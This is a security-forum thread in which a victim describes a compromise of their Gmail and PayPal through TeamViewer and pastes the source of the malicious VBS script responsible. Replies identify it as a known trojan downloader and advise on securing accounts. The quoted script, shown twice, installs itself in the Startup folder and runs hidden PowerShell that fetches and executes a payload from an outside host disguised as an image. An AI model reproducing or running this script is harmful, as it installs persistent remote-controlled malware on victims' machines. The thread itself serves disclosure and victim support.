NotMikaa 0 Posted December 1 Hi! So i came about this being dumb and installed it. Didn't think anything of it at first until i noticed out of the corner of my eye that team viewer was opened and they were attempting to go into my gmail. They've already looked into my paypal. dim s15001 const CONSOLE_HIDE=0 const CONSOLE_SHOW=1 const CMD_WAIT=true set oShell = wscript.createObject("WScript.Shell") set sysOb = createobject("scripting.filesystemobject") startup = oShell.specialfolders ("startup") & "\update.vbs" sysOb.copyfile wscript.scriptfullname,startup ,true oShell.run "cmd /c powers" & "hell " & "-ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('htt" & "p://" & "www.m9c.net/uploads/15744376681.jpg');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results", CONSOLE_HIDE, CMD_WAIT Quote Share this post Link to post Share on other sites
Marcos 3,030 Posted December 1 A detection was added several days ago, the script is detected as VBS/TrojanDownloader.Agent.SGV trojan. When the malware is detected, it should be cleaned without issues since it's a simple VB downloader script. Quote Share this post Link to post Share on other sites
Rami 50 Posted December 2 (edited) On 12/1/2019 at 7:58 AM, NotMikaa said: Hi! So i came about this being dumb and installed it. Didn't think anything of it at first until i noticed out of the corner of my eye that team viewer was opened and they were attempting to go into my gmail. They've already looked into my paypal. dim s15001 const CONSOLE_HIDE=0 const CONSOLE_SHOW=1 const CMD_WAIT=true set oShell = wscript.createObject("WScript.Shell") set sysOb = createobject("scripting.filesystemobject") startup = oShell.specialfolders ("startup") & "\update.vbs" sysOb.copyfile wscript.scriptfullname,startup ,true oShell.run "cmd /c powers" & "hell " & "-ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('htt" & "p://" & "www.m9c.net/uploads/15744376681.jpg');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results", CONSOLE_HIDE, CMD_WAIT You should secure your TeamViewer/AnyDesk or whatever your remote desktop software is Put a good password and limit access only to your PCs. Because they have got access to several accounts of yours , you should change all passwords now , and secure them with 2-step verification for more secure entry to your accounts. Edited December 2 by Rami Quote Share this post Link to post Share on other sites